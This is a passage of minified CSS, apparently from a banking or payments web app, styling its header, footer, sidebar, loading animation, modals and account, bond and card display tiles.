!important}.ml-xl-1{margin-left:4px !important}.ml-xl-2{margin-left:8px !important}.ml-xl-3{margin-left:12px !important}.ml-xl-4{margin-left:16px !important}.ml-xl-5{margin-left:20px !important}.ml-xl-6{margin-left:24px !important}.ml-xl-7{margin-left:28px !important}.ml-xl-8{margin-left:32px !important}.ml-xl-9{margin-left:36px !important}.ml-xl-10{margin-left:40px !important}.ml-xl-11{margin-left:44px !important}.ml-xl-12{margin-left:48px !important}.ml-xl-auto{margin-left:auto !important}.mx-xl-0{margin-left:0px !important;margin-right:0px !important}.mx-xl-1{margin-left:4px !important;margin-right:4px !important}.mx-xl-2{margin-left:8px !important;margin-right:8px !important}.mx-xl-3{margin-left:12px !important;margin-right:12px !important}.mx-xl-4{margin-left:16px !important;margin-right:16px !important}.mx-xl-5{margin-left:20px !important;margin-right:20px !important}.mx-xl-6{margin-left:24px !important;margin-right:24px !important}.mx-xl-7{margin-left:28px !important;margin-right:28px !important}.mx-xl-8{margin-left:32px !important;margin-right:32px !important}.mx-xl-9{margin-left:36px !important;margin-right:36px !important}.mx-xl-10{margin-left:40px !important;margin-right:40px !important}.mx-xl-11{margin-left:44px !important;margin-right:44px !important}.mx-xl-12{margin-left:48px !important;margin-right:48px !important}.mx-xl-auto{margin-left:auto !important;margin-right:auto !important}.my-xl-0{margin-top:0px !important;margin-bottom:0px !important}.my-xl-1{margin-top:4px !important;margin-bottom:4px !important}.my-xl-2{margin-top:8px !important;margin-bottom:8px !important}.my-xl-3{margin-top:12px !important;margin-bottom:12px !important}.my-xl-4{margin-top:16px !important;margin-bottom:16px !important}.my-xl-5{margin-top:20px !important;margin-bottom:20px !important}.my-xl-6{margin-top:24px !important;margin-bottom:24px !important}.my-xl-7{margin-top:28px !important;margin-bottom:28px !important}.my-xl-8{margin-top:32px !important;margin-bottom:32px !important}.my-xl-9{margin-top:36px !important;margin-bottom:36px !important}.my-xl-10{margin-top:40px !important;margin-bottom:40px !important}.my-xl-11{margin-top:44px !important;margin-bottom:44px !important}.my-xl-12{margin-top:48px !important;margin-bottom:48px !important}.my-xl-auto{margin-top:auto !important;margin-bottom:auto !important}}.d-none{display:none !important}.d-auto{display:initial !important}.d-block{display:block !important}@media screen and (min-width: 576px){.d-sm-none{display:none !important}.d-sm-auto{display:initial !important}.d-sm-block{display:block !important}}@media screen and (min-width: 768px){.d-md-none{display:none !important}.d-md-auto{display:initial !important}.d-md-block{display:block !important}}@media screen and (min-width: 992px){.d-lg-none{display:none !important}.d-lg-auto{display:initial !important}.d-lg-block{display:block !important}}@media screen and (min-width: 1200px){.d-xl-none{display:none !important}.d-xl-auto{display:initial !important}.d-xl-block{display:block !important}}.required::after{content:'*';color:#EE2E63}.ellipsis-2{display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden;text-overflow:ellipsis}html,body{margin:0;padding:0;width:100%;height:100%;overflow-y:auto;overflow-x:hidden;font-size:14px;font-family:'SVN-Gilroy';line-height:1.5715;color:#062A46}@media screen and (max-width: 374px){html,body{width:375px;overflow:auto}}*{-webkit-overflow-scrolling:touch;-webkit-tap-highlight-color:transparent}#root{display:flex;min-height:100%}#root-modal #backdrop-modal{opacity:0}#root-modal #backdrop-modal:not(:last-child){z-index:887;opacity:.5;position:fixed;top:0;left:0;width:100vw;height:100vh;background-color:#000}#root-modal #backdrop-modal+div .modal{background:transparent}.grecaptcha-badge{visibility:collapse !important}#app{width:100%;display:flex;flex-direction:column;background-color:#F4F8FB;min-height:100%}::-webkit-input-placeholder{color:#9EB3C9;font-size:14px;font-size:14px;font-weight:400;line-height:20px}:-ms-input-placeholder{color:#9EB3C9;font-size:14px;font-size:14px;font-weight:400;line-height:20px}::placeholder{color:#9EB3C9;font-size:14px;font-size:14px;font-weight:400;line-height:20px}button,.noselect{-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}a.cus-btn{display:inline-flex;justify-content:center;align-items:center}input{border-radius:0;outline:none;-webkit-appearance:none;-moz-appearance:none;appearance:none}.cus-btn{display:inline-block}.cus-btn.small{height:36px;width:auto;font-size:14px;line-height:18px;padding:0 16px 0 16px}.cus-btn.medium{width:auto;height:48px;font-size:16px;line-height:22px;padding:0 16px 0 16px}.cus-btn.large{width:auto;height:56px;font-size:18px;line-height:24px;padding:0 16px 0 16px}.cus-btn.normal{background:#005993;border-radius:4px;border:none;color:#fff}.cus-btn.empty{background:#fff;border-radius:4px;border:1px solid #005993;color:#005993}.cus-btn.disable{background:#F2F6F9;border-radius:4px;border:none;color:#9EB3C9}.cus-btn.ghost{background:#fff;border:none;color:#005993}.app-list__item{border-bottom:1px dashed #C9D9EA;padding:16px 0}.money-text{margin-left:16px;color:#C9D9EA}.money-in{color:#005993}.money-out{color:#EE2E63}.wrap-value{padding-right:152px}.card-img{width:100%;padding-top:62%;position:relative;background-size:cover;background-position:center;border-radius:8px;background-color:#F4F8FB}@media print{.noprint{visibility:hidden}}@media screen and (max-width: 374px){html,body{width:100% !important}}#app-footer{position:relative}#app-footer .f-icon img{width:96px;left:50%;bottom:0;position:absolute;-webkit-transform:translate(-236px, 0);-ms-transform:translate(-236px, 0);transform:translate(-236px, 0)}#app-footer.full-width .f-icon img{transform:translateX(-50%)}#app-footer .f-content{color:#fff;display:flex;flex-direction:column;background-image:url("/static/image/icon/footer-bg.png");background-size:cover;background-position:center;background-repeat:no-repeat}#app-footer .f-content .f-close{position:absolute;top:16px;right:16px;width:24px;height:24px}#app-footer .f-content .f-info{flex:1 1 auto;padding:16px 64px 8px;display:flex;align-items:center;justify-content:center;width:100%;max-width:1920px;margin:auto;position:relative}#app-footer .f-content .f-info .f-item{min-width:166px;display:flex;text-align:center;flex-direction:column;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}#app-footer .f-content .f-info .f-item__title{margin-top:4px}#app-footer .f-content .f-info .f-item img{width:32px;height:32px;align-self:center}@media screen and (max-width: 1023px){#app-footer .f-content .f-info .f-item img{width:24px;height:24px}}#app-footer .f-content .f-info hr{width:29px;margin:0 24px;border:1px solid #1A73AB;border-bottom:none;-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg)}#app-footer .f-content .wrap-f-bottom{border-top:1px solid #1A73AB}#app-footer .f-content .f-bottom{max-width:1920px;margin:auto;padding:8px 64px;opacity:0.5;color:#fff;display:flex;flex-direction:row;align-items:center}#app-footer .f-content .f-bottom .f-bottom__item{cursor:pointer}#app-footer .f-content .f-bottom .f-bottom__item:not(:first-child){margin-left:40px}#app-footer .f-content .f-bottom .f-bottom__item:nth-last-child(1){margin-left:auto}#app-footer .f-content .f-bottom img{width:18px;height:18px;cursor:pointer;margin-left:8px;vertical-align:sub}#app-footer .f-content .f-info,#app-footer .f-content .f-bottom{-webkit-transition:padding 0.8s;-moz-transition:padding 0.8s;-o-transition:padding 0.8s;transition:padding 0.8s}@media screen and (max-width: 1279px){#app-footer .f-content .f-info{padding:16px 24px 8px}#app-footer .f-content .f-info hr{margin:0 12px}#app-footer .f-content .f-bottom{padding:8px 24px}}@media screen and (max-width: 1023px){#app-footer .f-icon img{transform:translateX(-50%)}#app-footer .f-content .f-info{padding:8px 16px;flex-direction:column;align-items:flex-start}#app-footer .f-content .f-info .f-item{padding:8px 0;flex-direction:row;align-items:center;white-space:pre-wrap;min-width:auto}#app-footer .f-content .f-info .f-item__title{margin-top:0;margin-left:16px;text-align:left}#app-footer .f-content .f-info .f-item:first-child{padding-right:16px}#app-footer .f-content .f-info hr{display:none}#app-footer .f-content .wrap-f-bottom{border-top:none}#app-footer .f-content .f-close{top:12px;right:12px}#app-footer .f-content .f-bottom{border-top:1px solid #1A73AB;padding:16px 0;margin:0 16px;flex-direction:column;align-items:flex-start}#app-footer .f-content .f-bottom>*{margin-left:0 !important;margin-top:8px}#app-footer .f-content .f-bottom__download{order:-1}#app-footer .f-content .f-bottom__download--label{order:-2;margin-top:0}#app-footer .f-content .f-bottom__download img{width:24px;height:24px;margin-left:16px}#app-footer .f-content .f-bottom__download img:first-child{margin:0}}.main-menu{z-index:2;flex:1 1;margin:0;margin-left:80px;padding:0;display:flex;font-size:16px;list-style:none;flex-direction:row}.main-menu:hover .submenu .inner-menu{visibility:visible;opacity:1;display:block}.main-menu .submenu{color:#fff;flex:1 1;position:relative;padding:0 16px;overflow:hidden}.main-menu .submenu .title{position:relative;font-size:16px;font-weight:500;height:72px;line-height:72px;max-width:100%;display:inline-flex}.main-menu .submenu .inner-menu{width:100%;padding:12px 0;list-style:none;display:none;opacity:0;transition:all 0.05s;visibility:hidden}.main-menu .submenu .inner-menu .option{color:#A8B9C6;cursor:pointer;padding:12px 0}.main-menu .submenu .inner-menu .option:hover,.main-menu .submenu .inner-menu .option.active{color:#005993 !important}.main-menu .submenu.active .bottom-line,.main-menu .submenu:hover .bottom-line{left:0;width:100%;height:0px;bottom:19px;position:absolute;border:1px solid #FFFFFF;mix-blend-mode:overlay}.main-menu .submenu:hover{-webkit-box-shadow:0px 0px 10px rgba(112,159,214,0.22);-moz-box-shadow:0px 0px 10px rgba(112,159,214,0.22);box-shadow:0px 0px 10px rgba(112,159,214,0.22)}.main-menu .submenu:hover .option{color:#062A46}.menu-mobile{display:none;z-index:110}@media screen and (max-width: 1023px){.main-menu{display:none}.main-menu .submenu .title{line-height:56px;height:56px}.menu-mobile{display:flex;flex-direction:column;position:fixed;width:100%;max-width:376px;top:56px;bottom:0;right:0;margin:0;background:linear-gradient(181.8deg, #005993 37.54%, #EA114E 100.06%),#C4C4C4;transition:transform .3s;transform:translateX(100%);overflow-y:auto}.main-header.open .menu-mobile{transform:translateX(0)}.menu-mobile__backdrop{background-color:black;opacity:.5;position:fixed;display:none;z-index:1;top:56px;bottom:0;right:0;left:0}.main-header.open .menu-mobile__backdrop{display:block}.menu-mobile__menu{padding:12px 16px;background-color:transparent}.menu-mobile__menu__icon{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;transition:transform 0.2s;transform:rotateZ(0)}.accordion__item.open .menu-mobile__menu__icon{transform:rotateZ(90deg)}.menu-mobile__submenu{background-color:white;color:#062A46;padding:8px 0}.menu-mobile__submenu .submenu__item{cursor:pointer;padding:12px 16px;padding-left:40px}.menu-mobile__submenu .submenu__item.active{color:#005993}.menu-mobile__btn-logout{align-self:flex-start;flex-shrink:0}}.main-header{top:0;z-index:99;position:sticky;position:-webkit-sticky;color:white;width:100%;height:72px;margin:0 auto;background:linear-gradient(90deg, #005993 36.46%, #EA114E 96.25%),#C4C4C4}.main-header__content{background-image:linear-gradient(white, white);background-position-y:72px;background-repeat:no-repeat;-webkit-box-shadow:0px 0px 10px rgba(112,159,214,0.22);-moz-box-shadow:0px 0px 10px rgba(112,159,214,0.22);box-shadow:0px 0px 10px rgba(112,159,214,0.22)}.main-header__content .wrap-content{max-width:1920px;margin:auto;padding:0 64px;padding-right:32px;display:flex;align-items:flex-start;flex-direction:row;justify-content:space-between;min-height:100%;-webkit-transition:padding 0.8s;-moz-transition:padding 0.8s;-o-transition:padding 0.8s;transition:padding 0.8s}.main-header .app-logo{cursor:pointer;max-width:240px;overflow:hidden}.main-header .app-logo img{max-width:100%;max-height:48px;min-height:24px;object-fit:contain}.main-header .app-logo,.main-header .main-header__actions{height:72px;display:flex;align-items:center}.main-header .hover-line,.main-header .active-line{top:53px;width:89px;height:2px;opacity:.5;position:absolute;background:#fff;mix-blend-mode:overlay}.main-header .btn-toggle{display:none;position:relative}.main-header .btn-toggle.open::after{content:'';position:absolute;display:block;left:calc(50% - 28px);bottom:-16px;width:56px;height:2px;background-color:white;mix-blend-mode:overlay;opacity:0.8}@media screen and (max-width: 1279px){.main-header__content .wrap-content{padding:0 24px}}@media screen and (max-width: 1023px){.main-header{height:56px;background:#005993;border-bottom:1px solid #1875B1}.main-header.open{z-index:110}.main-header__content .wrap-content{padding:0 16px}.main-header .app-logo{width:50%;cursor:pointer;max-width:240px;overflow:hidden}.main-header .app-logo,.main-header .main-header__actions{height:56px}.main-header .btn-logout{display:none}.main-header .btn-toggle{display:block}}.app-loading{position:fixed;z-index:999;margin:auto !important;height:2em;width:2em;top:0;left:0;right:0;bottom:0}.app-loading:before{top:0;left:0;width:100%;height:100%;content:'';display:block;position:fixed;background-color:rgba(0,0,0,0.2)}.app-loading:not(:required){font:0/0 a;color:transparent;border:0;text-shadow:none;background-color:transparent}.app-loading:not(:required) .loading-content{width:200px;text-align:center;-webkit-transform:translate(-50%, 0);-ms-transform:translate(-50%, 0);transform:translate(-50%, 0)}.app-loading:not(:required) span{display:inline-block;margin:0 2px;padding:6px;background:red;border-radius:100%;-webkit-animation-name:scaleDot;animation-name:scaleDot;-webkit-animation-duration:1500ms;animation-duration:1500ms;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-timing-function:linear;animation-timing-function:linear}.app-loading:not(:required) span:nth-child(1){background-color:#5bbbe0}.app-loading:not(:required) span:nth-child(2){background-color:#26afe4;-webkit-animation-delay:0.2s;animation-delay:0.2s}.app-loading:not(:required) span:nth-child(3){background-color:#0074a0;-webkit-animation-delay:0.4s;animation-delay:0.4s}.app-loading:not(:required) span:nth-child(4){background-color:#b90000;-webkit-animation-delay:0.6s;animation-delay:0.6s}.app-loading:not(:required) span:nth-child(5){background-color:#ff3d3d;-webkit-animation-delay:0.8s;animation-delay:0.8s}@-webkit-keyframes scaleDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@-moz-keyframes scaleDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@-ms-keyframes scaleDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@-o-keyframes scaleDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@keyframes scaleDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}.app-container.no-header .main-container{flex-basis:100% !important;max-width:100% !important}.app-container.no-header .main-container>div:first-of-type{max-width:100%}.app-container .main-container{background-color:#F4F8FB;max-width:calc(100% - 376px);flex-basis:calc(100% - 376px)}.app-container .main-container.full-width{flex:1 1 100%;max-width:100%}.app-container .main-container>div:first-of-type{margin:0 auto}.app-container .main-container::-webkit-scrollbar{background-color:#F4F8FB;width:16px}.app-container .main-container::-webkit-scrollbar-track{background-color:#F4F8FB}.app-container .main-container::-webkit-scrollbar-thumb{background-color:#F4F8FB;border-radius:16px;border:4px solid #F4F8FB}.app-container .main-container::-webkit-scrollbar-button{display:none}.app-container .main-container:hover::-webkit-scrollbar-thumb{background-color:#E7EEF3 !important}@media screen and (max-width: 1279px){.app-container .main-container{flex-basis:calc(100% - 336px);max-width:calc(100% - 336px)}}@media screen and (max-width: 1023px){.app-container .main-container{flex-basis:100%;max-width:100%}}.quick-access-menu{min-height:464px}.quick-access-menu--disabled{pointer-events:none;cursor:default;filter:grayscale(1);opacity:0.4}.quick-access-menu__item{cursor:pointer;display:flex;margin-top:16px;align-items:center}.quick-access-menu__item:first-child{margin-top:24px}.quick-access-menu__item__icon{margin-right:8px;width:24px;height:24px}.quick-access-menu__item__detail{overflow-x:hidden}.quick-access-menu__item__name{font-size:14px;font-weight:400;line-height:20px;color:#062A46;white-space:nowrap;overflow-x:hidden;text-overflow:ellipsis}.quick-access-menu__item__code{margin-top:4px;font-size:12px;font-weight:400;line-height:20px;color:#9EB3C9}.quick-access-menu__item .paragraph-4,.quick-access-menu__item .payment-layout__body__notice{letter-spacing:1px}.empty-bills,.no-require-bills,.recent-contact--empty{background-image:url("/static/image/background/empty.svg");background-repeat:no-repeat;background-size:100%;margin-top:32px;padding-top:54%;text-align:center}.empty-bills .app-btn,.no-require-bills .app-btn,.recent-contact--empty .app-btn{margin-top:16px}.failed-fetch-api{padding:32px 24px;text-align:center}.failed-fetch-api img{width:160px}.quick-access-menu__btn--show-all{margin-top:8px;text-align:center}.sidebar-info{width:100%;display:flex;flex-direction:row;align-items:flex-start;justify-content:space-between}.sidebar-info .avatar{width:56px;height:56px;cursor:pointer;flex-shrink:0;position:relative}.sidebar-info .avatar>img{width:56px;height:56px;border-radius:50%;object-fit:contain;border:2px solid #165993}.sidebar-info .avatar::after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;border-radius:50%;z-index:-1}.sidebar-info .avatar .membership-ranking{position:absolute;bottom:0;right:0;width:20px;height:20px;border-radius:50%;z-index:1}.sidebar-info .avatar .membership-ranking::before{content:'';position:absolute;top:1px;left:1px;width:calc(100% - 2px);height:calc(100% - 2px);border-radius:50%;background-color:#fff;z-index:1}.sidebar-info .avatar .membership-ranking::after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;border-radius:50%}.sidebar-info .avatar .membership-ranking img{position:absolute;top:50%;left:50%;width:12px;height:12px;transform:translate(-50%, -50%);z-index:2}.sidebar-info .avatar.silver>img,.sidebar-info .avatar.gold>img,.sidebar-info .avatar.platinum>img,.sidebar-info .avatar.diamond>img{border:2px solid transparent}.sidebar-info .avatar.silver::after,.sidebar-info .avatar.silver .membership-ranking::after{background-image:linear-gradient(45deg, #697F90, #E3EEF5)}.sidebar-info .avatar.gold::after,.sidebar-info .avatar.gold .membership-ranking::after{background-image:linear-gradient(45deg, #FF9B21, #FFE6B8)}.sidebar-info .avatar.platinum::after,.sidebar-info .avatar.platinum .membership-ranking::after{background-image:linear-gradient(45deg, #338DC0, #CBE6FE)}.sidebar-info .avatar.diamond::after,.sidebar-info .avatar.diamond .membership-ranking::after{background-image:linear-gradient(45deg, #EA114E, #FFB8C2)}.sidebar-info .info{width:100%;margin-left:16px}.sidebar-info .username{display:inline-block;margin-top:8px;font-size:16px;font-weight:500;line-height:24px;color:#062A46}.sidebar-info .loyalty-btn{border:1px solid #CBE6FE;border-radius:4px;padding:2px 8px;height:24px;font-size:12px;font-weight:400;line-height:16px;color:#005993}.sidebar-info .loyalty-btn img{width:16px;height:16px;margin-right:4px}.situation-menu{border:1px solid #CBE6FE;border-radius:10px}.situation-menu__page{color:#005993;font-size:14px;font-weight:400;line-height:20px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;padding:10px 20px;transition:background-color .2s;position:relative}.situation-menu__page:first-child{border-top-left-radius:10px;border-top-right-radius:10px}.situation-menu__page:last-child{border-bottom-left-radius:10px;border-bottom-right-radius:10px}.situation-menu__page:not(:first-child)::after{content:'';position:absolute;width:100%;top:0;left:0;height:1px;background-color:#E7EEF3}.situation-menu__page:not(:empty){cursor:pointer}.situation-menu__page:not(:empty):hover{background-color:#F4F8FB}.situation-menu__page:empty{height:40px}.sidebar-wrapper{background:#fff;position:relative;-webkit-transition:width 0.8s,min-width 0.8s,transform 0.3s;-moz-transition:width 0.8s,min-width 0.8s,transform 0.3s;-o-transition:width 0.8s,min-width 0.8s,transform 0.3s;transition:width 0.8s,min-width 0.8s,transform 0.3s;flex-basis:376px;max-width:376px}.sidebar-wrapper .sidebar-content{padding:40px 32px;position:sticky;position:-webkit-sticky;top:72px;-webkit-transition:padding 0.8s;-moz-transition:padding 0.8s;-o-transition:padding 0.8s;transition:padding 0.8s}.sidebar-wrapper .sidebar-content.at-bottom{position:absolute;bottom:0}.sidebar-wrapper .sidebar-partial:nth-child(n+2){margin-top:24px}.sidebar-btn-toggle{display:none;position:fixed;bottom:24px;right:24px;z-index:109;cursor:pointer}.sidebar-backdrop{display:none}@media screen and (max-width: 1279px){.sidebar-wrapper{flex-basis:336px;max-width:336px}.sidebar-wrapper .sidebar-content{padding:32px 24px;top:72px}}@media screen and (max-width: 1023px){.app-container.no-header{padding-top:0}.app-container.no-header .sidebar-btn-toggle{display:none}.app-container .sidebar-wrapper{position:fixed;top:0;bottom:0;overflow-y:auto;right:0;transform:translateX(100%);z-index:102;max-width:376px;width:100%}.app-container .sidebar-wrapper.open{transform:translateX(0)}.app-container .sidebar-wrapper .sidebar-content{padding:16px 24px;top:0}.app-container .sidebar-wrapper .sidebar-content .btn-logout-mobile{display:block}.app-container .sidebar-btn-toggle{display:block}.app-container .sidebar-backdrop{display:block;position:fixed;top:0;bottom:0;left:0;right:0;background-color:rgba(0,0,0,0.5);z-index:101}}.app-container{flex:1 1 auto;display:flex;flex-direction:row;align-items:stretch;width:100%;max-width:1920px;margin:auto}.app-container.no-header{padding-top:0}.app-container.mobile-app .payment-layout{padding:40px 16px 24px}.app-container.mobile-app .mobile-close{position:absolute;right:4px;top:4px;width:40px;z-index:9999}.chat-box{position:-webkit-sticky;position:sticky;bottom:0;z-index:99;left:calc((100% - 1920px) / 2);width:100%;max-width:1920px}.chat-box .chat-box__content{position:absolute;bottom:16px;right:16px}.chat-box.hide{display:none}.network-error-modal{max-width:480px !important;text-align:center}.network-error-modal .modal-content{padding:32px}@media screen and (max-width: 1023px){.network-error-modal .modal-content{padding:32px 16px}}.network-error-modal img{max-width:240px;pointer-events:none}@media screen and (max-width: 1023px){.network-error-modal img{max-width:200px}}.reload-modal{max-width:480px !important;text-align:center}.reload-modal .modal-content{padding:8px}@media screen and (max-width: 1023px){.reload-modal .modal-content{padding:32px 16px}}.reload-modal img{max-width:240px;pointer-events:none}@media screen and (max-width: 1023px){.reload-modal img{max-width:200px}}.reload-modal__actions>*:not(:first-child){margin-left:16px}@media screen and (max-width: 1023px){.chat-box{position:fixed;left:0}.chat-box .chat-box__content{right:0;left:16px}}.accordion__summary{cursor:pointer}.accordion__details__wrap{overflow:hidden;transition:max-height .2s}.modal-soft-otp{max-width:520px;padding:32px;position:relative;min-height:448px;display:flex;flex-direction:column;align-items:center;justify-content:center;text-align:center;margin:auto}.modal-soft-otp img{max-width:100%}.modal-soft-otp .button-close{position:absolute;top:24px;right:24px}.not-require-otp{margin-top:24px;white-space:pre-wrap;color:#005993}@media screen and (max-width: 1023px){.not-require-otp{margin-top:12px}}.auth-waiting{margin-top:16px;text-align:center}.auth-failed{padding-top:24px;text-align:center}.auth-failed img{width:160px}.beneficiary-account{position:relative}.beneficiary-account.open .beneficiary-account__input__icon{background-color:#F4F8FB}.beneficiary-account.open .beneficiary-account__input input{border-color:#005993}.beneficiary-account.error .beneficiary-account__input input{border-color:#EA114E}.beneficiary-account__input{position:relative}.beneficiary-account__input input{height:48px;width:100%;border:1px solid #C9D9EA;padding:8px 48px 8px 16px;font-size:16px;font-weight:500;line-height:24px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.beneficiary-account__input input:focus{border-color:#005993}.beneficiary-account__input__icon{position:absolute;right:1px;top:1px;width:calc(48px - 2px);height:calc(100% - 2px);display:flex;flex-direction:row;align-items:center;justify-content:center;cursor:pointer}.beneficiary-account__input__icon::before{content:'';position:absolute;top:50%;left:0;transform:translateY(-50%);width:1px;height:calc(100% - 24px);background-color:#C9D9EA}.beneficiary-account__input__icon img{width:24px;height:24px}.beneficiary-account .beneficiary-account__contact{position:absolute;top:calc(100% + 4px);left:0;background-color:#fff;width:100%;z-index:1}.beneficiary-account__error-message{margin-top:8px;font-size:14px;font-weight:400;line-height:20px;color:#EA114E}.beneficiary-account__detail{position:relative;transform:translateY(-1px);border:1px solid #C9D9EA;border-top:none;background-color:#fff;font-size:14px;font-weight:400;line-height:20px}.beneficiary-account__detail::before{content:'';position:absolute;top:0;left:16px;width:calc(100% - 32px);height:1px;background-color:#005993}.beneficiary-account.focus .beneficiary-account__detail,.beneficiary-account.open .beneficiary-account__detail{display:none}.beneficiary-account__detail__group{padding:8px 16px}.beneficiary-account__detail__group:not(:first-child){border-top:1px solid #C9D9EA}.beneficiary-account__detail__item{padding:4px 0;width:100%;display:flex}.beneficiary-account__detail__item span:nth-child(1){flex-grow:1}.beneficiary-account__detail__item span:nth-child(2){flex-shrink:0;text-align:right}.beneficiary-account .vt-select__control{cursor:text}.block-account-credit{width:291px;height:176px;padding:64px 16px 16px;position:relative;background:#fff;background-image:url("/static/image/icon/card-account-credit-bg.svg");background-repeat:no-repeat;background-position:right 17px bottom 0;border-radius:10px;cursor:pointer;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1)}.block-account-credit.active{border:1px solid #FFB8C2}.block-account-credit .card-icon{top:8px;right:8px;position:absolute;display:flex}.block-account-credit .card-icon img{width:24px;height:24px}.block-account-credit .card-name{color:#062A46}.block-account-credit .card-status{margin:4px 0 12px;line-height:20px}.block-account-credit .status-point{padding:0 5px 2px 0}.block-account-credit .status-text{color:#9EB3C9;font-size:12px;line-height:20px}.block-account-credit .card-no{margin-bottom:4px;display:inline-block;cursor:text}.block-account-credit .card-no .overlay-text{color:#A8B9C6;padding-left:4px}.block-account-credit .card-alias{cursor:text;letter-spacing:normal}.block-account-credit .card-alias .overlay-text{color:#A8B9C6;padding-left:20px}.block-account-credit .card-balance .overlay-text{color:#9EB3C9;padding-left:4px}.block-account{width:291px;height:176px;padding:64px 16px 16px;position:relative;background:#fff;background-image:url("/static/image/icon/card-account-bg-2.svg");background-repeat:no-repeat;background-position:right 17px bottom 1px;border-radius:10px;cursor:pointer;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1)}.block-account.account-credit{background-image:url("/static/image/icon/card-account-credit-bg.svg")}.block-account.active{border:1px solid #FFB8C2}.block-account .card-icon{top:8px;right:8px;position:absolute;display:flex}.block-account .card-icon img{width:24px;height:24px}.block-account .card-name{color:#062A46}.block-account .card-status{margin:4px 0 12px;line-height:20px}.block-account .status-point{padding:0 5px 2px 0}.block-account .status-text{color:#9EB3C9;font-size:12px;line-height:20px}.block-account .card-no{margin-bottom:4px;cursor:text}.block-account .card-no .overlay-text{color:#A8B9C6;padding-left:4px}.block-account .card-alias{letter-spacing:normal}.block-account .card-alias .overlay-text{color:#A8B9C6;padding-left:20px}.block-account .card-balance .overlay-text{color:#9EB3C9;padding-left:4px}.block-bonds{width:291px;height:176px;padding:64px 16px 16px;position:relative;background:#fff;background-image:url("/static/image/icon/card-bonds-bg.svg");background-repeat:no-repeat;background-position:right 16px bottom 0;border-radius:10px;cursor:pointer;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1)}.block-bonds.active{border:1px solid #FFB8C2}.block-bonds .card-icon{top:16px;right:16px;position:absolute}.block-bonds .card-icon img{width:24px;height:24px}.block-bonds .card-icon>*:not(:first-child){margin-left:8px}.block-bonds .card-name{color:#062A46}.block-bonds .card-status{margin:4px 0 12px;line-height:20px}.block-bonds .status-text{color:#9EB3C9;font-size:12px;line-height:20px}.block-bonds .card-balance{margin-bottom:4px}.block-bonds .card-expire .overlay-text{color:#9EB3C9}.block-card{width:291px;height:176px;padding:64px 16px 16px;position:relative;background:#fff;background-image:url("/static/image/icon/card-card-bg.svg");background-repeat:no-repeat;background-position:right 0 bottom 0;border-radius:10px;cursor:pointer;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1)}.block-card.active{border:1px solid #FFB8C2}.block-card.blocked .card-icon,.block-card.blocked .card-level,.block-card.blocked .card-name,.block-card.blocked .card-status,.block-card.blocked .card-no,.block-card.blocked .card-balance{opacity:0.4;mix-blend-mode:luminosity}.block-card .card-icon{top:8px;right:8px;position:absolute;display:flex}.block-card .card-icon img{width:24px;height:24px}.block-card .card-icon .active-btn{min-width:0;margin:8px;padding:6px 12px;font-size:14px;font-weight:500;line-height:20px}.block-card .card-level{top:16px;left:16px;width:64px;height:40px;position:absolute}.block-card .card-name{color:#062A46}.block-card .card-status{margin:0 0 4px;line-height:20px}.block-card .card-status .status-point{display:inline-block;width:4px;height:4px;border-radius:100%;background-color:#4CB944;margin-bottom:2px}.block-card .card-status .status-text{color:#9EB3C9;font-size:12px;line-height:20px;margin-left:5px}.block-card .card-status.inactive .status-text{color:#4CB944}.block-card .card-status.lock .status-point{background-color:#EA114E}.block-card .card-status.lock .status-text{color:#EA114E}.block-card .card-no{margin-bottom:6px;letter-spacing:4px;display:inline-block;cursor:text}.block-card .card-no .overlay-text{color:#A8B9C6}.block-card .card-no .element:nth-of-type(4n){margin-right:16px}.block-card .card-no .element:last-of-type{margin-right:0}.block-card .card-balance .overlay-text{color:#9EB3C9;padding-left:4px}.block-card .card-overlay{position:absolute;top:0;left:0;width:100%;height:100%;background:linear-gradient(344.19deg, #CFEBFF 1.49%, rgba(255,255,255,0) 74.2%);display:flex;justify-content:center;align-items:center;flex-direction:column}.block-card .card-overlay 